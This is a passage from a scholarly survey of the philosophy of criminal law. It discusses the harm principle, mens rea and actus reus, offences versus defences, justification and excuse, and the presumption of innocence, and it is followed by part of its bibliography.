Harm-based arguments are nowadays ubiquitous when proposed criminal laws are discussed. Some think this shows that (HPP) is no constraint at all (Harcourt 1999). But it is no surprise that those who merely pay lip service to a principle are not constrained by it. The argument of the previous paragraph was an argument that (HPP) should be followed. To follow that principle is to take seriously the need for an empirical showing—grounded in adequate evidence—that a given law is necessary to prevent a proportionate amount of harm. A better objection is that the error-based argument is incomplete. How widespread would error be if law-makers took themselves to be free of (HPP)? When are the benefits of following (HPP)—in errors prevented—worth the costs—in otherwise impeccable criminal laws? Might there be some other rule that brings us those benefits at a lower cost than (HPP)? We need answers to all these questions, and more, to know if an argument from within non-ideal theory can support (HPP) (Tadros 2016, 94–96).
A number of other possible constraints on the criminal law have been proposed (Dan-Cohen 2002, 150–171; Ripstein 2006). As mentioned earlier, some are skeptical of all such principles. To determine the limits of the criminal law, they think, we must refer to a ‘more disorderly set of considerations’, none of which gives us anything as simple as a (set of) constraint(s): the resulting account of criminal law’s limits will be ‘messier’ than its rivals; but this is ‘what the messy worlds in which we live require’ (Duff et al 2014, 51–52). The correct response to this skepticism remains unclear. One possibility is that a defensible general line can indeed be found. The question is where the line is, and how it is to be defended against objections like those sketched above. A second possibility is that we need the ‘messier’ theory. If so, we must ask what shape that theory ought to take, and how lofty should be the ambitions of those who construct it. We need to know how much order can be imposed, at the theoretical level, on the ‘disorderly set of considerations’ with which we are confronted (for one answer, see Tadros 2016, 159–172). As the criminal law’s scope in many jurisdictions continues to expand at a dizzying pace, these remain the most urgent questions facing today’s philosophers of criminal law.
5. Criminal Responsibility
Imagine that \(D\) takes \(V\)’s property without \(V\)’s consent. Is \(D\) criminally responsible for the taking? Not necessarily. In English law, \(D\) commits the offence of theft only if \(D\) acts dishonestly, and intends for \(V\) to be deprived of her property permanently. Theft is one of many offences commission of which depends on one’s state of mind. Elements of offences that require particular mental states are known as mens rea elements. Other elements are known as actus reus elements.
Some claim that if \(D\) satisfies all elements of an offence—if D commits the actus reus with mens rea—this suffices to make \(D\) criminally responsible, but not to make D criminally liable. Responsibility is understood here as answerability (Duff 2007, 19–36). While we are answerable to the courts for committing offences, we may avoid liability by offering satisfactory answers in the form of defences. This account of criminal responsibility—call it the answerability account—relies on a distinction between offence and defence to which we will return. One argument for the answerability account invokes rules of criminal procedure and evidence. To obtain a conviction, the prosecution must prove that \(D\) committed the offence beyond a reasonable doubt. \(D\) can safely remain silent in the absence of such proof. If the prosecution makes its case, \(D\) has strong prudential reasons to prove a defence: without one, \(D\) will be convicted and punished. The best explanation of these rules, so the argument goes, is that offending acts generate a duty to answer that is otherwise absent. This duty explains why, when we have strong reason to believe \(D\) to be an offender, we put \(D\) under extra rational pressure to explain herself in court.
Some think that, on closer inspection, our rules of procedure and evidence fail to support the answerability account, and help to undermine it. Those rules tell prosecutors to consider evidence both that \(D\) committed an offence and that \(D\) lacks a defence. If there is strong evidence that \(D\) killed in self-defence, D should not be prosecuted. This matters here for the following reason. When prosecutors decide whether to prosecute, they are deciding whether D should be called to answer for what \(D\) did. The fact that prosecutors should not prosecute if \(D\) clearly killed in self-defence, suggests that those who have defences are not answerable in court. It suggests that we owe the criminal courts answers not for acts that are offences but for acts that are crimes—for offending acts which do not satisfy an available defence. Obviously enough, it is for crimes that we are criminally liable. If responsibility is answerability, and we are answerable for crimes, the conditions of criminal responsibility and the conditions of criminal liability are one and the same. The answerability account, as described above, then fails (Duarte d’Almeida 2015, 239–267).
5.1 Mens Rea
On any view, the conditions under which \(D\) commits an offence are conditions of criminal responsibility. What should these conditions be? There has been much discussion of the mens rea principle (MR):
- \(D\) should be criminally responsible for \(\phi\)ing only if \(\phi\)ing is partly constituted by an element of mens rea.
Standard mens rea requirements include intention and recklessness. Paradigmatically, we intend \(X\) if, and only if, \(X\) is one of our reasons for acting: if, and only if, we act in order to bring \(X\) about. We are reckless about \(X\) if, and only if, (i) we are aware there is a risk of \(X\), and (ii) running the risk of which we are aware is unjustified.
Whether criminal responsibility should require mens rea, and what mens rea it should require, both depend on the reasons we have to accept (MR). Perhaps the most familiar defence appeals to the culpability principle (C):
- \(D\) should be criminally liable for \(\phi\)ing only if \(D\) is culpable for having \(\phi\)ed.
Culpability, as that term is used here, is a moral notion. It is synonymous with moral fault or moral blameworthiness. Mens rea is not sufficient for culpability—even intentional killings are sometimes excused. But it may well be necessary—culpability may presuppose at least some element of mens rea (Simester 2013; cf. Gardner 2007, 227–232). If this is so, the debate shifts to whether we should accept (C). One worry about this principle is its generality. The consequences of criminal liability are not always especially burdensome. And the benefits of liability without culpability may be especially significant. To take but one example, think of regulations that govern the activities of corporations, and which protect the health and safety of the public at large. Making it a criminal offence to violate these regulations, and imposing hefty fines, need have none of the destructive effects of imprisoning individuals. Dispensing with culpability requirements may increase the deterrent effects of the law, by making it harder for violators to escape conviction. Whether (C) is sound depends on whether effects like these—which, ex hypothesi, protect the health and safety of many—can justify imposing criminal liability without culpability.
That (C) may admit of exceptions does not, of course, show that (C) is not generally sound. I suggested above that, where (C) does apply, it entails (MR). How much mens rea (C) requires is a further question. Take the offence of causing death by dangerous driving. The actus reus of the crime requires two things: \(D\)’s driving must exhibit deficiencies that we reasonably expect a qualified driver to avoid, and those deficiencies must cause the death of another person. Some think that (C) calls for two mens rea requirements: \(D\) must have been aware of the deficiencies that made her driving dangerous, and she must have been aware of a risk that they would cause death. The idea that each actus reus element should have a corresponding mens rea element is known as the correspondence principle (Ashworth 2008). Whether (C) in fact supports that principle is a matter of debate. It is sometimes the case that the risk of causing some harmful outcome (like death) helps make it the case that an act (like dangerous driving) is wrongful. There is an internal connection, in these cases, between our assessment of the act and the risk of the outcome. Some claim that where this internal connection exists, \(D\)’s awareness that she was engaged in the wrongful act establishes that she is culpable for the harmful outcome. If this is right, \(D\) need not have any mens rea as to that outcome in order to be culpable for it when it occurs: the correspondence principle cannot be derived from (C) (Simester 2005, 44–46; Duff 2005, 143–147).
A second defence of (MR) appeals to the rule of law (RL):
- the law should be such that those to whom it applies can use its norms to guide their conduct.
Conformity to (RL) is a matter of degree. But an especially high degree of conformity is expected of the criminal law. One reason for this is the special powers criminal law confers on \(D\)’s accusers. Another is the damage a guilty verdict does to the life of the accused. The connection between (RL) and (MR) is clearly stated by Gardner:
According to the ideal known as the rule of law, those of us about to commit a criminal wrong should be put on stark notice that that is what we are about to do. The criminal law should not ambush us unexpectedly. Of course, to avoid unexpected ambushes we all need to know what the law requires of us. For that reason, criminal laws should be clear, open, consistent, stable, and prospective. … Even all this, however, is not enough to ensure that those of us about to violate the criminal law are put on stark notice that we are about to violate it. For we may know the law and yet have no grasp that what we are about to do might constitute a violation of it. That is because often we have no idea which actions we are about to perform. I make a light-hearted remark and (surprise!) I offend one of my guests. I turn on my oven and (surprise!) I blow all the fuses. The mens rea principle is the principle according to which such actions – the self-surprising ones – should not be criminal wrongs (Gardner 2005, 69–70).
If \(D\) must be aware of those aspects of her actions that make them of interest to the criminal law, she is less likely to be ambushed by criminal offences that prohibit those actions. In this way, mens rea requirements contribute to personal autonomy by increasing our ability to steer our lives away from criminal conviction and punishment. So (RL) supports (MR). Does it also support the correspondence principle? This is less clear. One view has it that \(D\)’s awareness of the facts that made her driving dangerous disqualifies \(D\) from complaining that she was ambushed by liability for \(V\)’s death (at least as long as said liability was adequately publicized). On another view, \(D\)’s autonomy not only counts in favour of helping \(D\) to anticipate criminal liability, it also counts in favour of helping \(D\) to anticipate its legal consequences, such that \(D\) can decide if the price of those consequences is worth paying (Hart 1968, 47; Ashworth 2008). If it does not occur to \(D\) that \(\phi\)ing might cause death, it also does not occur to \(D\) that \(\phi\)ing might result in her suffering the additional punishment prescribed for causing it. \(D\) is more likely to factor this information into her decision-making if the criminal law insists that \(D\) is aware of the risk—if it insists on correspondence between actus reus and mens rea.
A third argument for (MR) appeals to liberty (Simester and Chan 2011, 393–395). Consider an offence that prohibits damaging other people’s property. If the mens rea requirement is one of intent, \(D\) is free to knowingly take risks with \(V\)’s possessions. If the mens rea requires awareness, \(D\) is free to put \(V\)’s possessions in harm’s way without giving thought to the risks. If there is no mens rea at all, no amount of care will help \(D\) if she causes property to be damaged. These examples help show that mens rea requirements affect the range of options legally available to \(D\). Obviously enough, the degree to which we should care about taking options off the table depends on how much value they have. This makes the liberty-protecting role of mens rea especially important where criminal responsibility extends beyond paradigmatic cases of wrongdoing. Consider the law of complicity. Under what conditions should S be criminally responsible for participating in wrongs committed by P? Imagine it is sufficient that S realises P might act wrongly. Anyone who sells goods that are liable to misuse is then in danger of being turned into a criminal by their customers. Shopkeepers must run the gauntlet or close their doors. Narrower mens rea requirements enable them to both stay in business and ensure they remain on the right side of the law (Simester 2006, 591–592).
It is worth concluding this section by returning to two questions distinguished at its outset: (i) should criminal responsibility require mens rea? (ii) what mens rea should it require? Question (i) is often discussed under the heading of strict liability. The literature distinguishes between various senses in which liability can be strict (Duff 2005; Gardner 2005, 68–69; Simester 2005, 22–23). Criminal liability for \(\phi\)ing is substantively strict if we can \(\phi\) without being culpable for \(\phi\)ing. It is formally strict if \(\phi\)ing lacks elements of mens rea. This second category can itself be subdivided. Liability is formally strict in the strong sense when there is no mens rea element at all. Liability is formally strict in the weak sense when at least one actus reus element has no corresponding element of mens rea. If (C) is a sound principle, criminal liability should not be substantively strict. If (MR) is sound, there should be no criminal liability that is formally strict in the strong sense. If the correspondence principle is sound, liability that is formally strict in the weak sense also should not exist.
So much for question (i). What about question (ii)? The above discussion assumed that mens rea at the very least requires awareness. But criminal liability sometimes turns not on what D noticed, but on what \(D\) failed to notice—on circumstances that would have caused a reasonable person to refrain from doing what \(D\) did. It is where such circumstances exist that \(D\)’s actions are negligent. Some writers claim that negligence has no place in criminal law. If (C) is sound, and culpability requires awareness, then criminal liability should require recklessness at the very least. Others take a different view. They claim that when we are unaware of risks because of vices like arrogance or indifference, this makes us culpable for running those risks. So (C) is compatible with at least some instances of negligence liability in criminal law (Hart 1968, 136–157; Simester 2000, Alexander and Ferzan 2009, 69–85; Moore and Hurd 2011).
5.2 Actus Reus
Whether or not mens rea should be necessary for criminal responsibility, it is rarely claimed that it should be sufficient. The widespread belief that we should not countenance thought crimes, leads most writers to claim that there should be an actus reus element to each criminal offence. Paradigmatically, this element is satisfied only if \(D\) acts in a way that causes some outcome, such as death, or property damage, or fear of violence. This paradigm does, of course, admit of a number of exceptions. As well as inchoate offences—like attempts or conspiracies—most systems of criminal law include liability for some omissions. Imagine \(D\) sees \(V\) drowning in a shallow pond and chooses to do nothing. There is no prior connection between \(D\) and \(V\). If the pond is in London, \(D\) commits no offence. Move the drama to Paris and we have ourselves a crime. As this example suggests, both academics and legal systems remain divided over the positive obligations that should be imposed by criminal law (Alexander 2002; Ashworth 2015).
Exceptions aside, the building blocks of our paradigm are each open to interpretation. Consider, for instance, the need for causation. Is the conclusion that \(D\) caused \(V\)’s death a matter of physical fact—something that is, in Hume’s well-known phrase, part of the cement of the universe? Or do the rules of causation—at least in criminal law—lie downstream of moral judgments about the fair attribution of responsibility? Does the truth, perhaps, lie somewhere in between? (Hart and Honoré 1959; Moore 2009b; Simester 2017). The criminal liability of many—as well as the punishments they face—turns on the answer we give to such questions.
Academic debate about causation and omissions largely takes our paradigm for granted. Some writers, however, take a more radical view: they favour a paradigm shift in our thinking about criminal responsibility. One group of radicals focuses on outcomes. Imagine D shoots at \(V\), intending to cause death. In any system of criminal law this is an attempt. The radicals claim that what happens next should make no difference: \(D\) should be convicted of the same crime whether or not \(V\) is killed. Criminal responsibility, in short, should be insensitive to the outcomes of what we do (Ashworth 1993; Alexander and Ferzan 2009, 171–196). Consider again what I earlier called (C):
- \(D\) should be criminally liable for \(\phi\)ing only if \(D\) is culpable for having \(\phi\)ed.
If this principle is sound, we can offer the following argument:
- We are culpable only for what is within our control;
- There are always factors that bear on the outcomes of our actions that we do not control;
- We should not be criminally responsible for outcomes.
This argument relies on the following suppressed premise:
- We only control \(X\) if there is no factor that bears on \(X\) that we do not control.
It is only if (2\('\)) is true that we never control outcomes. Alas, (2\('\)) has unpalatable implications. Uncontrolled factors do not only bear on whether we succeed. They also bear on whether we try, on the choices we make, and on the character traits that influence our choices. (2\('\)) implies that we are never culpable for any of these things—for our successes, our endeavours, our choices or our character. Pursued to its logical conclusion, it implies that we are never culpable for anything (Nagel 1979; Moore 1997, 233–246). If, as most people believe, we sometimes are culpable for what we do, (2\('\)) must be false. We can add that (3) radically understates the conclusion of the argument offered above. When combined with (C), that argument does not imply that we should not be criminally responsible for outcomes. It implies that no one should ever be criminally responsible.
We might try to salvage the argument from (1)–(3) by revising our account of control:
- We control \(X\) if we have a reasonable chance of preventing \(X\) or bringing \(X\) about.
This revision avoids the unpalatable implications of (2\('\)). But it also renders the argument from (1)–(3) invalid. If (2\(''\)) states the correct account of control, we do sometimes have control over outcomes. Imagine \(D\) holds a loaded gun to \(V\)’s head and pulls the trigger. \(D\) has a reasonable chance—indeed, an extremely high chance—of killing \(V\). On this account of control, (1) and (2) do not support (3): they give us no reason to accept that we are never criminally responsible for outcomes (Moore 2009, 24–26).
We have already seen that, for some, we are criminally responsible for committing offences and criminally liable for committing crimes. This distinction relies on a further distinction between offences and defences: crimes are committed by those who satisfy all the elements of an offence, without satisfying all the elements of any available defence.
One account of the offence/defence distinction is procedural. Offence elements must be proved if conviction is to be the legally correct verdict of the court. So if absence of consent is an offence-element—as it is in the offences created, in England and Wales, by the Sexual Offences Act 2003—it must be proved that consent was absent or \(D\) must be acquitted. The same is not true of defence elements, like those that make up the defence of duress. For a conviction to be correctly entered, it need not be proved that \(D\) did not act under duress. It is enough that there is no evidence that \(D\) acted under duress. The same is true where consent is a defence-element—as it is in the offences created, in England and Wales, by the Offences Against the Person Act 1861. If \(D\) punches \(V\) and is charged with assault occasioning actual bodily harm, the court need not be convinced that \(V\) did not consent. If the issue of consent never comes up, a conviction may still be the legally correct verdict of the court. Simply put, that \(D\) satisfied each offence element is something that must be proved. Whether \(D\) satisfied each defence element can remain uncertain. It is in this procedural distinction, on the view under consideration, that the offence/defence distinction consists (Duarte d’Almeida 2015).
This last claim is denied by those who believe that the offence/defence distinction is substantive. These writers accept that offences and defences are governed by different procedural rules. Their claim is that the distinction between offences and defences explains why those rules differ. Perhaps the most well-known version of this view runs as follows. Offence elements are individually necessary, and jointly sufficient, to describe an act that there is general reason not to perform. Defence elements block the transition from the existence of that reason to the conclusion that \(D\) ought to be convicted of a crime. On this view, whether we should think of the absence of consent as an element of the offence of sexual assault, depends on whether we think that there is a general reason not to have consensual sex with others. If there is no such reason, the absence of consent is necessary to give us an act we have general reason not to perform. So it is an element of the offence of sexual assault. If, on the other hand, there is a general reason not to have consensual sex, consent is properly thought of as a defence to sexual assault (Campbell 1987; Gardner 2007, 144–149).
In addition to distinguishing between offences and defences, many writers distinguish between types of criminal defence. The most familiar distinction is between justifications and excuses. The most familiar account of the distinction has it that while justified actors deny wrongdoing, excused actors deny either responsibility or culpability (Austin 1956; Fletcher 1978; Greenawalt 1984; Baron 2005). Two questions are worth asking here. Is the familiar distinction worth drawing? If so, is the familiar account of the distinction the right way to draw it?
There are two reasons to answer the first question in the affirmative. One invokes (C). If courts are to develop criminal defences so that their contours track culpability, they need to know why each defence makes it the case that those who plead it are not culpable. Is there a defence of necessity because we sometimes do the right thing by choosing the lesser of two evils? Or does the defence exist because actors sometimes make wrongful choices under enormous pressure, and because there is sometimes nothing culpable about giving into the pressure? How courts should develop the defence depends on how they answer these questions. It depends on whether they conceive of the defence as a justification or an excuse.
A second reason to make the familiar distinction invokes the idea that criminal trials call defendants to account. On this view, trials are in one way continuous with life outside the law—they institutionalize our ordinary moral practice of making and replying to accusations (Gardner 2007, 177–200; Duff, 2010c; 2011; 2013a). When accused of wrongdoing in our everyday lives, most of us do not only care about whether we end up being blamed. Where we did nothing wrong, we try to convince our accusers that this is the case: it matters to us that others not add wrongs to the story of our lives, even if we know that they will otherwise conclude that we acted blamelessly. There is no reason to think that things are different in criminal courts: that those accused of crime should, or do, care only about getting off the hook. By retaining distinct justificatory and excusatory defences, the criminal law gives effect to our interests in presenting ourselves—to our accusers and to others—in the best available rational light (Gardner 2007, 133).
Let us turn, then, to the second of our questions. Is it true that justifications deny wrongdoing? Is it true that excuses deny responsibility? Some think both questions should at least sometimes be answered in the negative. True, those who act in self-defence plausibly benefit from an exception to the duty not to harm others. Having placed \(D\) under attack, many think, \(V\) has no right that \(D\) not use necessary and proportionate force against \(V\) (McMahan 2005). But the same is not true when \(D\) harms an innocent bystander, even if this is the only way to prevent even greater harm to others. \(V\)’s right remains, it is often thought, but is sometimes overridden. So \(D\) still wrongs \(V\). That wrong is justified when and because \(D\) has undefeated reasons to commit it—reasons given by the greater harm prevented by \(D\). If this is right, those who plead a justification do not always deny, but sometimes concede, wrongdoing. It is the wrong that they then try to justify (Gardner 2007, 77–82).
The familiar account might be thought to be on firmer ground when it comes to excuses. Grant that to plead an excuse is indeed to deny culpability. The same is true of a justification. So there is nothing here to distinguish the two. Do excuses, then, deny responsibility? At least sometimes, they do not. True, those who plead insanity deny that they were capable of responding to reasons when they acted. But this is not true of other excusatory pleas. Imagine \(T\) bursts into \(D\)’s house and threatens to shoot \(D\) unless \(D\) shoots \(V\). If \(D\) pleads duress, \(D\) relies on the fact that her capacity to respond to reasons remained intact: her plea is that she offended in order to avoid the harm threatened by \(T\), and in doing so lived up to our reasonable expectations. \(D\) thereby asserts rather than denies responsibility for an offending act (Gardner 2007, 82–87). This does not mean that duress is a justification. \(V\)’s right to life defeats the reasons \(D\) has to save her own. \(D\) has a defence because we do not expect any more from someone in \(D\)’s predicament—because we can understand why saving her own life seemed a good enough reason to \(D\) (Simester 2012, 105).
Two points emerge from these remarks. One is that the familiar account of the justification/excuse distinction should be rejected. The second is that a bipartite classification of criminal defences obscures distinctions we have reason to make. Some respond by distinguishing denials of responsibility (like insanity) from excuses (like duress), and distinguishing both from justifications (like self-defence and necessity). Excuses and justifications, so understood, are both assertions of responsibility and denials of culpability. Justified actors have undefeated reasons for their actions. Excused actors live up to reasonable expectations despite lacking such reasons (Gardner 2007, 91–139; Simester 2012, 99–108). Though this tripartite classification is an improvement, some maintain that further distinctions should be drawn (Duff 2007, 263–298; Simester 2012). Just how numerous the categories of criminal defence are (or ought to be) is a topic for future work.
6. Criminal Procedure and Evidence
Imagine there are reasons to believe that \(D\) is criminally responsible for having \(\phi\)ed. What may officials of the criminal justice system do in response to those reasons? What should they do, and refrain from doing?
As a matter of law, the answer depends on norms of criminal procedure and evidence. Some of these norms confer powers and permissions that help officials build their case against \(D\). Think of stop and search, intrusive forms of surveillance, and pre-trial detention. Other norms regulate the kinds of evidence that may be used against \(D\) in court. Think of hearsay, or statistical evidence, or evidence of \(D\)’s bad (or good) character (Ho 2008; Redmayne 2015). Yet other norms govern the way in which one aspect of the criminal justice system should respond to the misconduct of others. Imagine evidence against \(D\) was gathered illegally, or that \(D\) was entrapped, or that \(D\)’s case should have been discontinued according to the guidelines prosecutors set for themselves. Should the courts throw out \(D\)’s case, even where the evidence against \(D\) is strong? If so, on what grounds should they do so? (Ashworth 2000; Duff et al 2007, 225–257).
The norms I have mentioned are somewhat neglected by philosophers of criminal law. Things are different when it comes to the so-called presumption of innocence (PI). The most well-known judicial formulation of (PI) is found in Woolmington v. DPP UKHL 1:
Throughout the web of the English Criminal Law one golden thread is always to be seen … No matter what the charge or where the trial, the principle that the prosecution must prove the guilt of the prisoner is part of the common law of England and no attempt to whittle it down can be entertained.
So understood, (PI) allocates the burden of proof in criminal trials to those on the accusing side. Many add that \(D\)’s accusers must meet an especially high standard of proof—they must eliminate all reasonable doubt to secure a conviction. Though these points are widely accepted, they leave open a range of further questions about the scope and basis of (PI). The following remarks touch on just some (for an overview, see Lippke 2016).
One question is whether (PI) has implications for criminal procedure that extend beyond the criminal trial. On one view, (PI) just is a norm that governs the burden and standard of proof at trial. On another, (PI) is something more expansive: it is a norm that tells criminal justice officials—and, perhaps, the rest of us too—how to interact with others, including those suspected of crime (Stewart 2014, Duff 2013b). That norm of course has implications for the moment of trial. But its implications extend both backwards and forwards from that point in time. They extend backwards to decisions about whether to arrest, prosecute, or detain those suspected of criminality (Ashworth 2006, 249; Duff 2013b, 180–185; Stewart 2014, 414). And they extend forwards to decisions both about how much to punish (Tomlin 2014a), and about the appropriate collateral consequences of conviction and punishment (Duff 2013b, 185–192).
A second question is whether (PI) has implications for the substantive criminal law. Some writers—and most courts—think not. They give (PI) a purely procedural interpretation (Roberts 2005; Lippke 2016). It has been argued, however, that all such interpretations are implausibly narrow (Tadros 2007; 2014; Tomlin 2013). Imagine it is an offence to possess information of a kind that might be useful to terrorists, with the intention of committing acts of terror. Intentions like this are often difficult to prove. Legislators might respond by shifting the burden of proof to D: they might make it the case that, once the prosecution proves possession, it is for \(D\) to prove the absence of intention. The Woolmington formulation suggests that this move violates (PI). Now imagine a creative legislature simply eliminates the requirement of intention from the law: it becomes a crime to possess information of a kind that might be useful to terrorists, whatever the possessor’s intentions might be. Assuming that the prosecution must prove every element of the revised offence, this move brings the law into conformity with a purely procedural (PI). Now most writers—and most human rights treaties—consider (PI) to be an important right that protects criminal suspects against the state. Examples like the above show that the purely procedural interpretation has the following implication: legislators who offer suspects less protection somehow better conform to the right. Not only is this counterintuitive, it renders the right toothless in the face of legislative creativity (Tadros 2014). This is, some conclude, sufficient reason to reject the purely procedural (PI).
Imagine \(D\) is charged with a criminal offence and pleads not guilty. On the purely procedural view, (PI) makes it a precondition of conviction and punishment that the prosecution prove \(D\) satisfied all elements of the offence. What those elements are is a separate question. Some endorse a revised view that makes (PI) more demanding. These writers distinguish between elements of offences, and the wrongs taken by offence-creators to justify convicting and punishing offenders. (PI), they claim, not only requires proof that \(D\) satisfied the former; it also requires proof that \(D\) committed the latter (Tadros 2007; 2014).
To see the difference this revision makes, imagine legislators make it an offence to possess information that might be useful to terrorists. An intention to commit acts of terror is no element of the offence as legislated. Our legislators do not, however, think that all those who possess such information should be convicted and punished. This, they know, would be ridiculous overkill. They think that possessors who intend to commit acts of terror should be convicted and punished. This element of intention is omitted from the offence, because omitting it makes securing convictions easier for prosecutors, thereby reducing the risk that those planning acts of terror will get off the hook. (PI), on the revised view, nonetheless requires proof of the intent: ex hypothesi, it is possession with an intention to commit acts of terror that is taken by law-makers to justify convicting and punishing offenders. To comply with (PI), criminal courts must demand proof that \(D\) committed this wrong as a precondition of conviction and punishment.
So understood, (PI) is anything but toothless. It is often claimed, nowadays, that too few suspected wrongdoers are convicted of crimes, and that new criminal laws are needed to help secure more convictions. On the revised view, legislators can create as many criminal laws as they want in pursuit of this objective. But no-one who pleads not guilty may be convicted under them without proof that they are the wrongdoers they are suspected of being. That it provides anyone who faces criminal charges with this kind of protection against the law, is what makes the case for the revised (PI).
- Alexander, L., 2002, “Criminal Liability for Omissions – An Inventory of Issues” in S. Shute and A.P. Simester (eds.), Criminal Law Theory: Doctrines of the General Part, Oxford: Oxford University Press.
- Alexander, L. and Ferzan, K.K., 2009, Crime and Culpability: A Theory of Criminal Law, Cambridge: Cambridge University Press.
- Ashworth, A., 1993, “Taking the Consequences”, in S. Shute, J. Gardner, and J. Horder (eds.), Action and Value in Criminal Law, Oxford: Oxford University Press.
- –––, 2000, “Testing Fidelity to Legal Values: Official Involvement and Criminal Justice”, Modern Law Review, 63: 633–659.
- –––, 2006, “Four Threats to the Presumption of Innocence”, International Journal of Evidence & Proof, 10: 241–278.
- –––, 2008, “A Change of Normative Position: Determining the Contours of Culpability in Criminal Law”, New Criminal Law Review, 11: 232–256.
- –––, 2015, Positive Obligations in Criminal Law, Oxford: Oxford University Press.
- Ashworth, A., and L. Zedner, 2010, “Preventive Orders: A Problem of Under-Criminalization?”, in R.A. Duff, et al. (eds.), The Boundaries of the Criminal Law, Oxford: Oxford University Press.
- Austin, J. L., 1956, “A Plea for Excuses”, Proceedings of the Aristotelian Society, 57: 1–30.
- Baron, M., 2005, “Justifications and excuses”, Ohio State Journal of Criminal Law, 2: 387–406.
- Boonin, D., 2008, The Problem of Punishment, New York: Cambridge University Press.
- Brink, D., 2013, Mill’s Progressive Principles, Oxford: Oxford University Press.
- Campbell, K., 1987, “Offence and Defence”, in I. Dennis (ed.), Criminal Law and Justice, London: Sweet and Maxwell.
- Chalmers, J. and F. Leverick, 2008, “Fair Labelling in Criminal Law”, Modern Law Review, 71: 217–246.
- Chiao, V., 2016, “What is the Criminal Law For?”, Law and Philosophy, 35: 137–163.
- Christie, N., 1977, “Conflicts as Property”, British Journal of Criminology, 17: 1–15.
- Coons, C., and M. Weber (eds.), 2013, Paternalism: Theory and Practice, Cambridge: Cambridge University Press.
- Dan-Cohen, M., 2002, Harmful Thoughts: Essays on Law, Self, and Morality, Princeton: Princeton University Press.
- Dempsey, M. M., 2009, Prosecuting Domestic Violence, Oxford: Oxford University Press.
- –––, 2011, “Public Wrongs and the Criminal Law’s Business: When Victims Won’t Share”, in R. Cruft, M.H. Kramer, and M.R. Reiff (eds.), Crime, Punishment and Responsibility: The Jurisprudence of Antony Duff, Oxford: Oxford University Press.
- Devlin, P., 1965, The Enforcement of Morals, Oxford: Oxford University Press.
- Dorfman, A., and A. Harel, 2016, “Against Privatisation As Such”, Oxford Journal of Legal Studies, 36: 400–427.
- Duarte d’Almeida, L., 2015, Allowing for Exceptions: A Theory of Defences and Defeasibility in Law, Oxford: Oxford University Press.
- Duff, R. A., 2005, “Strict Liability, Legal Presumptions, and the Presumption of Innocence”, in A. P. Simester (ed.), Appraising Strict Liability, Oxford: Oxford University Press.
- –––, 2007, Answering for Crime: Responsibility and Liability in the Criminal Law, Oxford: Hart Publishing.
- –––, 2010a, “A Criminal Law for Citizens”, Theoretical Criminology, 14: 293–309.
- –––, 2010b, “Perversions and Subversions of Criminal Law”, in R.A. Duff, et al. (eds.), The Boundaries of the Criminal Law, Oxford: Oxford University Press.
- –––, 2010c, “Towards a Theory of Criminal Law”, Aristotelian Society Supplementary Volume, 84: 1–28.
- –––, 2011, “Responsibility, Citizenship and Criminal Law”, in R.A. Duff and S.P. Green (eds.), Philosophical Foundations of Criminal Law, Oxford: Oxford University Press.
- –––, 2013a, “Relational Reasons and the Criminal Law”, in L. Green and B. Leiter (eds.), Oxford Studies in Philosophy of Law (Volume 2), Oxford: Oxford University Press.
- –––, 2013b, “Who Must Presume Whom To Be Innocent of What?”, Netherlands Journal of Legal Philosophy, 42: 170–92.
- –––, 2014a, “Torts, Crimes and Vindication: Whose Wrong Is It?”, in M. Dyson (ed.), Unravelling Tort and Crime, Cambridge: Cambridge University Press.
- –––, 2014b, “Towards a Modest Legal Moralism”, Criminal Law and Philosophy, 8: 217–235.
- –––, 2016, “Legal Moralism and Public Wrongs”, in K.K. Ferzan and S.J. Morse (eds.), Legal, Moral and Metaphysical Truths: The Philosophy of Michael S. Moore, Oxford: Oxford University Press.
- Duff, R.A. and S. Marshall, 2010, “Public and Private Wrongs”, in J. Chalmers, F. Leverick, and L. Farmer (eds.), Essays in Criminal Law in Honour of Sir Gerald Gordon, Edinburgh: Edinburgh University Press.
- Duff, R.A. et al., 2007, The Trial on Trial (Volume 3), Oxford: Hart Publishing.
- Duff, R.A. et al. (eds.), 2014, Criminalization: The Political Morality of the Criminal Law, Oxford: Oxford University Press.
- Dworkin, G., 1972, “Paternalism”, The Monist, 56: 64–84.
- Edwards, J.R., 2014, “Harm Principles”, Legal Theory, 20: 253–285.
- –––, forthcoming, “Criminal Law’s Asymmetry”, Jurisprudence.
- Edwards, J.R., and A.P. Simester, 2014, “Prevention with a Moral Voice”, in A.P. Simester, A. du Bois-Pedain, and U. Neumann (eds.), Liberal Criminal Theory: Essays for Andreas von Hirsch, Oxford: Hart Publishing.
- –––, 2017, “What’s Public About Crime?”, Oxford Journal of Legal Studies, 37: 105–133.
- Feinberg, J., 1970, “The Expressive Function of Punishment”, in J. Feinberg, Doing and Deserving, Princeton: Princeton University Press.
- –––, 1984, Harm to Others, New York: Oxford University Press.
- –––, 1986, Harm to Self, New York: Oxford University Press.
- –––, 1988, Harmless Wrongdoing, New York: Oxford University Press.
- Fletcher, G., 1978, Rethinking Criminal Law, Boston: Little, Brown and Company.
- Gardner, J., 2005, “Wrongs and Faults”, in A. P. Simester (ed.), Appraising Strict Liability, Oxford, Oxford University Press.
- –––, 2007, Offences and Defences, Oxford: Oxford University Press.
- –––, 2011, “What is Tort Law For? Part 1. The Place of Corrective Justice”, Law and Philosophy, 30: 1–50.
- –––, 2013, “Punishment and Compensation: A Comment”, in R.L. Christopher (eds.), Fletcher’s Essays on Criminal Law, Oxford: Oxford University Press.
- Gardner, J. and S. Shute, 2000, “The Wrongness of Rape” in J. Horder (ed.), Oxford Essays in Jurisprudence: Fourth Series, Oxford, Oxford University Press.
- Green, L., 2013a, “Should Law Improve Morality?”, Criminal Law and Philosophy, 7: 473–494.
- –––, 2013b, “The Nature of Limited Government”, in J. Keown and R.P. George (eds.), Reason, Morality and Law: The Philosophy of John Finnis, Oxford: Oxford University Press.
- Greenawalt, K., 1984, “The Perplexing Borders of Justification and Excuse”, Columbia Law Review, 84: 1897–1927
- Hamlin, A., and Z. Stemplowska, 2012, “Theory, Ideal Theory and the Theory of Ideals”, Political Studies, 10: 48–62.
- Harcourt, B.E., 1999, “The Collapse of the Harm Principle”, Journal of Criminal Law and Criminology, 90: 109–192.
- Harel, A., 2014, Why Law Matters, Oxford: Oxford University Press
- Hart, H. L. A., 1963, Law, Liberty and Morality, New York: Random House.
- –––, 1968, Punishment and Responsibility, Oxford: Oxford University Press.
- –––, 1994, The Concept of Law, 2nd edition, Oxford: Oxford University Press.
- Hart, H.L.A., and A.M. Honoré, 1959, Causation in the Law, Oxford: Clarendon Press.
